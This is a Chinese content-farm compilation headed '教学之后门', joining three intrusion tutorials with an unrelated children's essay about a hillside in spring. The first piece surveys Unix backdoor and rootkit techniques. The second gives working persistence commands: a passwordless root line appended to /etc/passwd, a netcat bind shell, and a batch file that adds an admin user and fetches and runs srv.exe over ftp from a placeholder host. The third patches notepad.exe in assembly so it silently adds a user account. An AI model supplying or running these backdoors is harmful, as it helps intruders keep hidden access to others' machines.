教学之后门

下面是小编为大家整理的教学之后门，本文共4篇，如果喜欢可以分享给身边的朋友喔!

篇1： 教学之后门

通常我们在得到一个主机的控制权后，总是考虑下次如何轻易的能再次进来，而不需要每次都重复复杂的漏洞利用，也有可能系统管理员发现了漏洞及时的补上了呢，

教学之后门

。那么我们需要安装backdoor（后门），这样只要管理员没有发现被入侵或没有发现我们的后门，下次就可以非常轻松的进来了。在这我们介绍一些常用的后门。

Rhosts + + 后门

在unix系统里，一些Rsh、Rlogin通过基于rhosts文件的简单认证。在某个帐户的home下的rhosts文件里加上一行++，那么任何人任何机器都可以不需要密码登陆这个帐户了。

校验和与时间戳 后门

严格的讲，这只是一个隐藏后门的方法。我们通常用自己写的木马来代替系统原来的一些可执行文件来达到后门的效果。许多管理员通过时间戳和校验和来检查是否存在这样的木马。我们可以通过一些小技巧来很容易的欺骗，一个简单的程序通过修改系统时钟就能使文件的时间戳和原始一样，至于校验和是用CRC，更加容易伪造了。所以系统管理员还是定期用MD5 校验和来检查文件吧。起码不可能伪造MD5的校验和。

Login 后门

这个是最常用的后门了，我们可以用login.c的源代码改一改，编译一下，替代原来的login，功能就是先检查我设定的密码，如果对的话，不去比较系统密码，直接进入，而对于其他用户来说和原来的login用起来感觉是一样的。而且在程序上可以不必记录utmp和wtmp，那么你用后门密码进去的时候就是隐形的了。为了防止strings命令显示出login的文本内容，从而暴露backdoor的后门密码。那么在改login.c的时候就得加密或隐藏口令了。但管理员还是可以用MD5校验和来发现这类后门。

Telnetd 后门

当inetd守护程序发现有telnet连接，就交给in.telnetd处理，进入login程序。在in.telnetd处理时通常检测一些其他信息，例如终端类型是Xterm还是vt100等，我们可以修改in.telnetd在这加一个类型hole,当我们选择hole时，系统将自动给个shell，而不需要认证。

Services 后门

每个服务都可以被利用来当作后门，象什么finger,rsh,rexec,rlogin,ftp,inetd...。这和那些开放某个

端口提供shell的后门程序没什么差别，只是隐蔽一点罢了。当然你可以修改inetd.conf加一些伪装成某

个服务的程序，名字可以是uutcp...等具有伪装性的。

Crontab 后门

Crontab使unix系统在特定的时间内执行指定的程序。我们可以让系统在每天的特定时间运行我们的指定

开放port的shell程序。当然系统管理员也会检查/usr/spool/cron/crontabs/下的文件来看有没有安排后门的存在。所以通过修改那些正常的cron程序，可以达到隐蔽的目的。

Library 后门

几乎所有的unix系统使用共享库文件，共享一些常用的调用。

通常我们在crypt.c和_crypt.c中安置后门程序。login.c使用crypt,如果在里头安置后门的话，在调用

Crypt()时，可以跳过校验，直接给出shell.这样就是管理员用MD5检验login程序也不会发现我们的后门了，

如果管理员MD5检查所有的文件，难免会发现这些问题。但我们还有一个方法，我们知道无论是什么程序，它都需要调用open()和其他的文件存取函数，如果我们能在这些上面做文章，那么当MD5执行时读取的是原来的文件，但执行的却是我们的后门程序，所以MD5看到的校验和是没有问题的。

kernel 后门

可装载内核后门是最难发现而且难度最高的了。具体的描述可以参看w00w00著名的Linux Kernel Module (LKM) Hacking。

www.w00w00.org/files/articles/lkmhack.txt

File system 后门

我们通常为了隐藏一些自己的后门程序、exploit程序、工具等文件，一般是采用.目录的隐藏方式。但很容易被发现，所以修改一些象ls、du、fsck等程序达到隐藏的目的要更好一些。

如果更狠一点，就可以把文件放在磁盘的块标志成坏的，并且采用特殊的文件系统格式，只有特定的程序才能读出，这样也可以达到很好的隐藏效果。 Bootblock 后门

在PC中病毒有一种类型叫引导型病毒，通过修改引导区程序来达到隐藏和执行的目的。当然有许多杀毒程序也能查杀这些病毒。但在unix中，很少有管理员会使用软件来检查引导区，所以把后门放到引导区也是一个很有用的方法。

进程隐藏 后门

为了不让管理员用ps发现我们后门程序运行的进程

一般有几种方法：

1、通过修改argv[]来使程序看起来象另一个进程。

2、改名成和系统进程类似的名字。

3、修改ps，使ps看不见。

4、利用amodload之类的程序，内核加入可装载模块来实现后门。

Rootkit

由许多工具构成的后门工具集。有一些这样的模块构成：

修改系统日志 utmp wtmp lastlog。

sniffer,passcracker。

欺骗时间戳和crc校验。

修改login

修改 ifconfig 的 PROMISC标志的输出。使检测不到分乱模式。

修改ps使发现不了进程。

隐藏使用的磁盘空间。

隐藏所有的rootkit文件。

TCP Shell 后门

最常见的后门了，一个程序listen端口，连接后给出shell.

容易被发现，netstat一看就知道了。

UDP Shell 后门

基于udp传输的后门，原理tcp shell后门差不多。

ICMP Shell 后门

通过ICMP协议建立pipe来实现通讯的后门。

ACK Shell后门

通过TCP中ACK数据片来进行通讯的后门。这个比较有意思，能避过许多防火墙，天网也不例外。

篇2： 技巧系列之常见的一些留后门手法

对于我们这样的菜手，好不容易搞了台服务器很不容易，如果被发现了就惨了，

技巧系列之常见的一些留后门手法

1. Setuid

#cp /bin/sh /tmp/.root#chmod u+s /tmp/.root

加上 suid 位到shell 上，虽然很简单，但容易被发现。

2. Echo “hack::0:0::/:/bin/csh” >>/etc/passwd

即给系统增加一个 ID 为 0（root)的帐号，无口令，但管理员用find命令就可以发现。

3.Echo “+ hack”>>/.rhosts

如果这个系统开了512、513的port，就可以。把一个名为hack加到.rhosts文件中，rlogin登陆，无须密码。

4.修改 Sendmail.cf文件

增加一个“wiz” 命令，然后telnet www.xxx.com 25后，wiz，这就可以了。

5. Rootkit backdoor

这些东西现在是很火热的东西，但小心该后的文件的适用性、日期等等一些小的细节。有的需要自己编译，有的是编译好的。

6.Remote shell

Sunx的那个backdoor就很不错，不会产生日记文件，防止who等等。需要编译，但运行在redhat 6.1很不错。但在7.1等版本中好象就有点bug。

或者可以bindshell，可以替换inetd.conf中不常用的服务，注意文件的修改时间。

7. Http后门

其实，一般的防火墙对Web服务的限制少的很，所以我们可以从这里入手，这里需要用到端口重定向，简单的说就是web开的http服务有2个，一个是http本身，一个是remote shell bindshell。防火墙过滤其他一切port，禁止反向连接，简单的就是可以用nc。（netcat这个）把cmd.exe绑定到80端口上去。telnet www.xxx.com 80 然后就得到一个shell。或者可以利用asp,php.cgi等代码写的后门，也可以作到相同的效果。

8.Bat后门（原创）

如果是xnix服务器，没办法。

Ms服务器：

backdoor.bat

net user hacker windychild /add

net localgroup administrators hacker /add ...create super admin user

echo open www.xxx.com>c:ftp.txt

echo xxx>>c:\\ftp.txtecho xxxxxx>>c:\\ftp.txt

echo get srv.exe>>c:\\ftp.txt

echo bye>>c:\\ftp.txt

ftp -s:c:\\ftp.txt

copy srv.exe c:\\winnt\\

c:\\winnt\\srv.exe

del c:\\ftp.txt

del c:\\srv.exe ......可以自己设置木马或后门等....或你可以写上开启3389服务，telnet的语句其他，开放共享服务！

net share ipc=ipc$

net share hdc=c$......

如果狠点的话，干脆再给它上个rootkit for win。

9.可以利用邮件编码漏洞

自己设置一个base64的编码文件发给你的朋友，然后把后门.exe转换成邮件编码。

其实，上面的方法都是很常见的方法。还有很多方法，一时没办法整理出来，但对于新手来说足够了

篇3：狗尾续貂之再谈逆向工程打造隐蔽的后门

信息来源：看雪论坛

文章作者：ngaut

本文测试平台：windows xp sp2, vc++6.0

我很喜欢孟方明［-273］的文章，很有启发性，常常是show一种思路，而不仅仅是一种方法，

《逆向工程打造隐蔽的后门》中的添加用户的后门,还没有做到真正的隐蔽，因为有2次会闪过

dos(我也不知道改叫什么窗口，暂且叫dos吧)窗口。但是孟方明提供了思路，我等菜鸟花了数星期研究之后，

小有心得，拿出来给大家分享，下面我来给出方法：

开始真正的测试之前，先看下面的下面这个程序代码(相信菜鸟也可以看懂)：

//测试程序，作用添加一个用户test并修改密码为windows

//AddUser.cpp

#include

int main(int argc, char* argv[])

{

system(“net user test /add”);

system(“net user test windows”);

system(“pause”); //暂停程序，以便查看程序是否成功运行，实际应用时去掉

return 0;

}

编译一下，将生成的程序重命名为AddUser.exe，运行(如图1)

没有关系，赶紧删除test这个用户

再来看看下面的代码：

// ExecuteAddUser.cpp

#include

int main(int argc, char* argv[])

{

ShellExecute(0, “open”, “AddUser.exe”, “”, “”, SW_HIDE); //注意SW_HIDE

system(“pause”); //暂停程序,以便查看程序是否成功运行，实际应用时去掉

return 0;

}

也编译一下，生成ExecuteAddUser.exe，现在把AddUser.exe复制到ExecuteAddUser.exe所在的目录。

运行ExecuteAddUser.exe, 嘿嘿，你没有看到AddUser.exe闪过dos窗口吧。去看看系统用户，

看到test用户了吧。为什么没有显示窗口呢？上面已经表示出来了这里的参数SW_HIDE就是不显示窗口

的意思，详细描述请查阅MSDN。而且进程列表里面没有cmd.exe

到这里我们的具体思路就已经出来了：

只要把ExecuteAddUser.exe的代码嵌入到某一个程序里面(假设这里是A.exe),这样每次运行A.exe就

会执行我们的AddUser.exe，如果把ExecuteAddUser.exe的代码嵌入到记事本，嘿嘿，那么这个用户就

很难从机器上消失了，是不是有点强盗逻辑。

想法是好的，但是要嵌入到某一个程序里面，就需要注意这里的参数SW_HIDE了，因为我们嵌入的时候，

代码不能用SW_HIDE。其实SW_HIDE是微软定义的一个宏而已，我想到一个比较傻的办法来解决这个问题。

在vc++的目录搜索。可能很多人没有用过系统的高级搜索功能，具体用法请看图2，终于在WINUSER.H中

找到如下定义：

/*

* ShowWindow Commands

*/

#define SW_HIDE    0

中间的省略。

#define SW_MAX    11

可以看到SW_HIDE被定义为1。

问题解决了，去掉AddUser.cpp中的system(“pause”); 去掉再次编译为AddUser.exe，复制到D盘(这里只是测试，实际上可能会被放到

c:\\windows\\system32\\......,藏得越深越好啊)。

剩下的事情就很简单了基本上就是和孟方明的操作一样。修改如下：

原来的记事本入口：

01006AE0 >$ 6A 70   PUSH 70

01006AE2 . 68 88180001 PUSH notepad.01001888

01006AE7 . E8 BC010000 CALL notepad.01006CA8

修改为：

01006AE0 >$ /E9 BB10 JMP notepad_.01007DA0

01006AE5 >|90    NOP

01006AE6 . |90    NOP

01006AE7 . |E8 BC010000 CALL notepad_.01006CA8

在01007D74添加如下字符：

01007D74 . 64 3A 5C 5C 4>ASCII “d:\\\\AddUser.exe”,0

01007D84 . 6F 70 65 6E 0>ASCII “open”,0

修改01007DA0为：

01007DA0 >\\60    PUSHAD

01007DA1 . 6A 00   PUSH 0           ; /IsShown = 0

01007DA3 . 6A 00   PUSH 0           ; |DefDir = NULL

01007DA5 . 6A 00   PUSH 0           ; |Parameters = NULL

01007DA7 . 68 747D0001 PUSH notepad_.01007D74      ; |FileName = “d:\\\\AddUser.exe”

01007DAC . 68 847D0001 PUSH notepad_.01007D84      ; |Operation = “open”

01007DB1 . 6A 00   PUSH 0           ; |hWnd = NULL

01007DB3 . 90    NOP            ; |

01007DB4 . 90    NOP            ; |

01007DB5 . 90    NOP            ; |

01007DB6 . E8 FEAB3F76 CALL SHELL32.ShellExecuteA     ; \\ShellExecuteA

01007DBB . 61    POPAD

01007DBC . 6A 70   PUSH 70

01007DBE . 68 88180001 PUSH notepad_.01001888

01007DC3 .^ E9 1DEDFFFF JMP notepad_.01006AE5

修改完成后保存为note_test.exe，运行，哈哈，没有看到dos窗口吧，看看系统用户吧，有个test吧，呵呵

成功，

现在修改路径AddUser.exe的路径吧，别忘了在记事本里修改啊，也不要忘了覆盖系统的记事本，除非

别人不用记事本，否则。。。。。。呵呵.。

感谢孟方明给大家带来的精彩思路。

篇4：后门山之春作文

一只彩色的蝴蝶把我引进了后门山，

后门山之春作文

“山不在高，有景则美；春不在早，有花则秀。”后山可美了！

后山的春景，最美的是他的花。最普通的，最多的就是黄灿灿的迎春花。迎春花，迎接春的到来，小学生作文大全你看，竹笋偷偷地跑了出来，调皮地伸着懒腰，张开大嘴贪婪吮吸大地母亲的乳汁，抛开所有的烦恼，无牵无挂地奔向大自然，尽情享受春光的沐浴，在春天的感召下，健康成长每一天。

我忍受不住自然的诱惑，去除我心爱的小提琴，无拘无束地弹奏起春光曲。这琴声，是赞美春天的歌，是赞美大自然的心声。

那迎春花、那竹笋、那琴声怎能不让我爱上春天，爱上家乡的后门山。

★新年后门的对联

★新年后门的对联

★中文版putty后门事件分析

★教你打造杀毒软件免杀的后门

★《黔之驴》教学设计

★四季之美 教学设计

★小学教学——简约之美

★教学实录之爱莲说教案

★生命之杯教学反思

★《挑山工》教学设计之六

《教学之后门（共4篇）.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

文档为doc格式